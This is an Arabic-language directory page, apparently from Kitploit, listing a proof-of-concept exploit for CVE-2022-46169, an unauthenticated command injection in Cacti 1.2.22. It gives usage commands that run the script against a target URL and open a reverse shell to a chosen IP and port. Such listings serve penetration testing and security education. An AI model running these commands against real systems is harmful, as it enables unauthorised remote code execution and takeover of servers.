Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/devilgothies/cve-2022-46169
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubdevilgothies/cve-2022-46169

CVE-2022-46169

PoC لـ CVE-2022-46169 الذي يؤثر على إصدار Cacti 1.2.22

عرض المستودع
منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-46169 POC

هذا نص برهان المفهوم (POC) للثغرة الأمنية CVE-2022-46169 التي تؤثر على Cacti الإصدار 1.2.22.

الوصف

تسمح الثغرة الأمنية CVE-2022-46169 بحقن أوامر غير مصادق عليه في إصدارات Cacti حتى 1.2.22، وذلك لتحقيق تنفيذ تعليمات برمجية عن بُعد غير مصادق عليه كمستخدم www-data. تنتج الثغرة عن التحقق غير السليم من إدخال المستخدم في معامل "host_id" في ملف "remote_agent.php".

الاستخدام

root@kitploit:~
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>

استبدل <TARGET_URL> بعنوان URL لتثبيت Cacti المستهدف، و<YOUR_IP> بعنوان IP الخاص بالجهاز الذي تريد استقبال الصدفة العكسية عليه، و<YOUR_PORT> برقم المنفذ الذي تريد استقبال الصدفة العكسية عليه.

مثال:

root@kitploit:~
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337

إخلاء مسؤولية

هذا النص البرمجي لبرهان المفهوم هو للأغراض التعليمية فقط. استخدمه على مسؤوليتك الخاصة. مؤلف هذا النص البرمجي غير مسؤول عن أي ضرر ناتج عن استخدامه. المراجع

CVE-2022-46169 - مدخل CVE للثغرة الأمنية.
نصائح أمان Cacti على Github

تنزيل الأداة